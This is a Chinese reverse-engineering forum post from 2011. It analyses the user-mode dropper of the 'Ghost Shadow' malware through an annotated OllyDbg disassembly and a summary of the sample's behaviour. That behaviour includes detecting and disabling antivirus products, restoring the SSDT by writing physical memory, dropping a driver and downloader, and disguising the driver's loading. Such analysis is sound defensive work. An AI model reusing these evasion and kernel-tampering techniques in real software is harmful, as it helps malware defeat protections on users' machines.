标 题: 【申精】鬼影母体R3部分分析
作 者: 苏
时 间: 2011-03-30,16:40:30
链 接: http://bbs.pediy.com/showthread.php?t=131317
这是前段时间比较牛X的一个病毒
里面用到的一些手段很不错
特拿来分析,与大家共享
不说废话,直接开始分析
先上个OD大图,给大家一个流程感
00404612 >/$ 55 push ebp
00404613 |. 8BEC mov ebp, esp
00404615 |. 81EC 580A0000 sub esp, 0A58
0040461B |. 53 push ebx
0040461C |. 56 push esi
0040461D |. 57 push edi
0040461E |. 6A 1D push 1D
00404620 |. 33DB xor ebx, ebx
00404622 |. 59 pop ecx
00404623 |. 33C0 xor eax, eax
00404625 |. 8DBD 4DFFFFFF lea edi, dword ptr [ebp-B3]
0040462B |. 889D 4CFFFFFF mov byte ptr [ebp-B4], bl
00404631 |. 6A 1D push 1D
00404633 |. F3:AB rep stos dword ptr es:[edi]
00404635 |. 66:AB stos word ptr es:[edi]
00404637 |. AA stos byte ptr es:[edi]
00404638 |. 59 pop ecx
00404639 |. 33C0 xor eax, eax
0040463B |. 8DBD D1FDFFFF lea edi, dword ptr [ebp-22F]
00404641 |. 889D D0FDFFFF mov byte ptr [ebp-230], bl
00404647 |. F3:AB rep stos dword ptr es:[edi]
00404649 |. 66:AB stos word ptr es:[edi]
0040464B |. AA stos byte ptr es:[edi]
0040464C |. E8 21F0FFFF call 00403672 ; 载入函数库
00404651 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
00404657 |. 50 push eax
00404658 |. E8 75FCFFFF call 004042D2 ; 获得系统目录,组合字符串
0040465D |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
00404663 |. C70424 607740>mov dword ptr [esp], 00407760
0040466A |. 50 push eax
0040466B |. FF15 78774000 call dword ptr [407778]
00404671 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
00404677 |. 50 push eax
00404678 |. FF15 74774000 call dword ptr [407774]
0040467E |. 83C4 0C add esp, 0C
00404681 |. 8BF0 mov esi, eax
00404683 |. 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00404689 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
0040468E |. 50 push eax ; |PathBuffer
0040468F |. 53 push ebx ; |hModule
00404690 |. FF15 6C604000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00404696 |. 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
0040469C |. C785 B8F9FFFF>mov dword ptr [ebp-648], 94
004046A6 |. 50 push eax ; /pVersionInformation
004046A7 |. FF15 E4604000 call dword ptr [<&KERNEL32.GetVersion>; \GetVersionExA
004046AD |. 83BD BCF9FFFF>cmp dword ptr [ebp-644], 5 ; 判断操作系统版本,只感染xp
004046B4 |. 74 05 je short 004046BB
004046B6 |. E8 42CBFFFF call 004011FD
004046BB |> 83BD C0F9FFFF>cmp dword ptr [ebp-640], 1
004046C2 |. 74 05 je short 004046C9
004046C4 |. E8 34CBFFFF call 004011FD
004046C9 |> 68 50774000 push 00407750 ; /MutexName = "Q360MonMutex"
004046CE |. 53 push ebx ; |InitialOwner
004046CF |. 53 push ebx ; |pSecurity
004046D0 |. FF15 E0604000 call dword ptr [<&KERNEL32.CreateMute>; \CreateMutexA
004046D6 |. FF15 58604000 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
004046DC |. 3D B7000000 cmp eax, 0B7 ; 检测360
004046E1 |. 74 34 je short 00404717
004046E3 |. 6A 01 push 1
004046E5 |. E8 27D5FFFF call 00401C11 ; 恢复SSDT
004046EA |. 59 pop ecx
004046EB |. E8 E1CDFFFF call 004014D1 ; nop
004046F0 |> E8 A7E0FFFF /call 0040279C ; 结束卡巴
004046F5 |. 85C0 |test eax, eax
004046F7 |. 74 0D |je short 00404706
004046F9 |. 68 E8030000 |push 3E8 ; /Timeout = 1000. ms
004046FE |. FF15 BC604000 |call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00404704 |.^ EB EA \jmp short 004046F0
00404706 |> 6A 01 push 1
00404708 |. 6A 02 push 2
0040470A |. 68 931A4000 push 00401A93
0040470F |. E8 CECEFFFF call 004015E2 ; 对抗其他杀软
00404714 |. 83C4 0C add esp, 0C
00404717 |> 68 F4010000 push 1F4 ; /Timeout = 500. ms
0040471C |. FF15 BC604000 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00404722 |. E8 3CFCFFFF call 00404363 ; 释放sys与ini文件
00404727 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
0040472D |. 50 push eax
0040472E |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4]
00404734 |. 50 push eax
00404735 |. FF15 70774000 call dword ptr [407770]
0040473B |. 59 pop ecx
0040473C |. C68435 4CFFFF>mov byte ptr [ebp+esi-B4], 30
00404744 |. 59 pop ecx
00404745 |. C68435 4DFFFF>mov byte ptr [ebp+esi-B3], 30
0040474D |. C68435 4EFFFF>mov byte ptr [ebp+esi-B2], 30 ; 释放00000000
00404755 |. 53 push ebx ; /hTemplateFile
00404756 |. C68435 4FFFFF>mov byte ptr [ebp+esi-B1], 30 ; |
0040475E |. 68 80000000 push 80 ; |Attributes = NORMAL
00404763 |. C68435 50FFFF>mov byte ptr [ebp+esi-B0], 30 ; |
0040476B |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
0040476D |. C68435 51FFFF>mov byte ptr [ebp+esi-AF], 30 ; |
00404775 |. 53 push ebx ; |pSecurity
00404776 |. C68435 52FFFF>mov byte ptr [ebp+esi-AE], 30 ; |
0040477E |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00404780 |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4] ; |
00404786 |. C68435 53FFFF>mov byte ptr [ebp+esi-AD], 30 ; |
0040478E |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00404793 |. C68435 54FFFF>mov byte ptr [ebp+esi-AC], 30 ; |
0040479B |. 50 push eax ; |FileName
0040479C |. 889C35 55FFFF>mov byte ptr [ebp+esi-AB], bl ; |
004047A3 |. FF15 04614000 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
004047A9 |. 8BF8 mov edi, eax
004047AB |. 83FF FF cmp edi, -1
004047AE |. 897D FC mov dword ptr [ebp-4], edi
004047B1 |. 75 05 jnz short 004047B8
004047B3 |. E8 45CAFFFF call 004011FD
004047B8 |> 53 push ebx ; /pFileSizeHigh
004047B9 |. 57 push edi ; |hFile
004047BA |. FF15 FC604000 call dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
004047C0 |. 6A 40 push 40 ; /Protect = PAGE_EXECUTE_READWRITE
004047C2 |. 68 00100000 push 1000 ; |AllocationType = MEM_COMMIT
004047C7 |. 50 push eax ; |Size
004047C8 |. 53 push ebx ; |Address
004047C9 |. 8945 F8 mov dword ptr [ebp-8], eax ; |
004047CC |. 895D F0 mov dword ptr [ebp-10], ebx ; |
004047CF |. 8945 E8 mov dword ptr [ebp-18], eax ; |
004047D2 |. FF15 24614000 call dword ptr [<&KERNEL32.VirtualAll>; \VirtualAlloc
004047D8 |. 8BF0 mov esi, eax
004047DA |. 8D45 F0 lea eax, dword ptr [ebp-10]
004047DD |. 53 push ebx ; /pOverlapped
004047DE |. 50 push eax ; |pBytesRead
004047DF |. FF75 F8 push dword ptr [ebp-8] ; |BytesToRead
004047E2 |. 56 push esi ; |Buffer
004047E3 |. 57 push edi ; |hFile
004047E4 |. FF15 0C614000 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
004047EA |. 8B4D F8 mov ecx, dword ptr [ebp-8]
004047ED |. 8BC6 mov eax, esi
004047EF |. 03CE add ecx, esi
004047F1 |. 3BF1 cmp esi, ecx
004047F3 |. 73 0D jnb short 00404802
004047F5 |> 8138 76620D78 /cmp dword ptr [eax], 780D6276
004047FB |. 74 05 |je short 00404802
004047FD |. 40 |inc eax
004047FE |. 3BC1 |cmp eax, ecx
00404800 |.^ 72 F3 \jb short 004047F5
00404802 |> 68 48010000 push 148
00404807 |. 68 94744000 push 00407494
0040480C |. 50 push eax
0040480D |. FF15 7C774000 call dword ptr [40777C]
00404813 |. 8B46 3C mov eax, dword ptr [esi+3C]
00404816 |. 83C4 0C add esp, 0C
00404819 |. 05 50010000 add eax, 150
0040481E |. 8945 F0 mov dword ptr [ebp-10], eax
00404821 |. 03C6 add eax, esi
00404823 |. 53 push ebx
00404824 |. 8B48 0C mov ecx, dword ptr [eax+C]
00404827 |. 894D F8 mov dword ptr [ebp-8], ecx
0040482A |. 8B40 08 mov eax, dword ptr [eax+8]
0040482D |. 8945 F0 mov dword ptr [ebp-10], eax
00404830 |. 50 push eax
00404831 |. 8D040E lea eax, dword ptr [esi+ecx]
00404834 |. 50 push eax
00404835 |. E8 FCF9FFFF call 00404236
0040483A |. 53 push ebx ; /Origin
0040483B |. 53 push ebx ; |pOffsetHi
0040483C |. 53 push ebx ; |OffsetLo
0040483D |. 57 push edi ; |hFile
0040483E |. 8B3D 08614000 mov edi, dword ptr [<&KERNEL32.SetFi>; |kernel32.SetFilePointer
00404844 |. FFD7 call edi ; \SetFilePointer
00404846 |. 8D45 F0 lea eax, dword ptr [ebp-10]
00404849 |. 53 push ebx ; /pOverlapped
0040484A |. 50 push eax ; |pBytesWritten
0040484B |. FF75 E8 push dword ptr [ebp-18] ; |nBytesToWrite
0040484E |. 56 push esi ; |Buffer
0040484F |. FF75 FC push dword ptr [ebp-4] ; |hFile
00404852 |. FF15 00614000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
00404858 |. 68 00400000 push 4000 ; /FreeType = MEM_DECOMMIT
0040485D |. FF75 E8 push dword ptr [ebp-18] ; |Size
00404860 |. 56 push esi ; |Address
00404861 |. FF15 1C614000 call dword ptr [<&KERNEL32.VirtualFre>; \VirtualFree
00404867 |. FF75 FC push dword ptr [ebp-4] ; /hObject
0040486A |. FF15 14614000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00404870 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
00404876 |. 50 push eax
00404877 |. 8D85 D0FDFFFF lea eax, dword ptr [ebp-230]
0040487D |. 50 push eax
0040487E |. FF15 70774000 call dword ptr [407770]
00404884 |. 8D85 D0FDFFFF lea eax, dword ptr [ebp-230]
0040488A |. 50 push eax
0040488B |. FF15 74774000 call dword ptr [407774]
00404891 |. 8BF0 mov esi, eax
00404893 |. 83C4 0C add esp, 0C
00404896 |. 8D85 D0FDFFFF lea eax, dword ptr [ebp-230]
0040489C |. C68435 D0FDFF>mov byte ptr [ebp+esi-230], 30
004048A4 |. C68435 D1FDFF>mov byte ptr [ebp+esi-22F], 30
004048AC |. C68435 D2FDFF>mov byte ptr [ebp+esi-22E], 30
004048B4 |. C68435 D3FDFF>mov byte ptr [ebp+esi-22D], 30
004048BC |. C68435 D4FDFF>mov byte ptr [ebp+esi-22C], 30 ; 复制成一个新文件
004048C4 |. 53 push ebx ; /FailIfExists
004048C5 |. C68435 D5FDFF>mov byte ptr [ebp+esi-22B], 30 ; |
004048CD |. 50 push eax ; |NewFileName
004048CE |. C68435 D6FDFF>mov byte ptr [ebp+esi-22A], 30 ; |
004048D6 |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4] ; |
004048DC |. C68435 D7FDFF>mov byte ptr [ebp+esi-229], 30 ; |
004048E4 |. C68435 D8FDFF>mov byte ptr [ebp+esi-228], 31 ; |
004048EC |. 50 push eax ; |ExistingFileName
004048ED |. 889C35 D9FDFF>mov byte ptr [ebp+esi-227], bl ; |
004048F4 |. FF15 D0604000 call dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA
004048FA |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
00404900 |. 50 push eax
00404901 |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4]
00404907 |. 50 push eax
00404908 |. FF15 70774000 call dword ptr [407770]
0040490E |. C68435 4CFFFF>mov byte ptr [ebp+esi-B4], 61
00404916 |. C68435 4DFFFF>mov byte ptr [ebp+esi-B3], 74
0040491E |. C68435 4EFFFF>mov byte ptr [ebp+esi-B2], 69
00404926 |. C68435 4FFFFF>mov byte ptr [ebp+esi-B1], 78
0040492E |. C68435 50FFFF>mov byte ptr [ebp+esi-B0], 69
00404936 |. 59 pop ecx
00404937 |. C68435 51FFFF>mov byte ptr [ebp+esi-AF], 2E
0040493F |. C68435 52FFFF>mov byte ptr [ebp+esi-AE], 73
00404947 |. 59 pop ecx
00404948 |. C68435 53FFFF>mov byte ptr [ebp+esi-AD], 79
00404950 |. C68435 54FFFF>mov byte ptr [ebp+esi-AC], 73
00404958 |. 889C35 55FFFF>mov byte ptr [ebp+esi-AB], bl
0040495F |. 68 34774000 push 00407734 ; /EventName = "Jiangmin_WallNotify_Notify"
00404964 |. 53 push ebx ; |InitiallySignaled
00404965 |. 53 push ebx ; |ManualReset
00404966 |. 53 push ebx ; |pSecurity
00404967 |. FF15 B0604000 call dword ptr [<&KERNEL32.CreateEven>; \CreateEventA
0040496D |. FF15 58604000 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
00404973 |. 3D B7000000 cmp eax, 0B7
00404978 |. 0F85 0F020000 jnz 00404B8D ; 判断是否存在江民
0040497E |. B9 81000000 mov ecx, 81 ; 下面是绕过江民主防部分
00404983 |. 33C0 xor eax, eax
1.病毒首先判断OS版本,只感染特定的Windows系统,并且保证内存映像的唯一性
2.先提升进程权限,再通过NtQuerySystemInformation获得ntoskrnl在磁盘上的真名,再通过导出的SSDT表,将原始的SSDT表内容读取出来,然后通过ZwSystemDebugControl直接写物理内存,从而恢复SSDT,然后用同样的手法恢复了
PsSetLoadImageNotifyRoutine
PsSetCreateProcessNotifyRoutine
PsSetCreateThreadNotifyRoutine
这三个函数,由于函数太长,就不截取OD里的,详细见IDA里的注释
3.病毒遍历进程,寻找卡巴进程,然后破坏进程
4.病毒释放驱动,驱动配置文件,木马下载器在
C:\Program files\MSDN\
目录下
5.通过创建互斥量方法判断江民杀毒软件是否存在,存在的话,绕过其主防
6.病毒再通过硬件驱动类型的加载方式加载驱动,以躲避主防的驱动加载监控
读写物理内存那块看得头晕,所以我就用C语言把它还原了,见附件
行为一个个用OD截取很麻烦
所以直接把IDB放上去,大家可以对应地看
过几天我再把驱动部分的分析发上来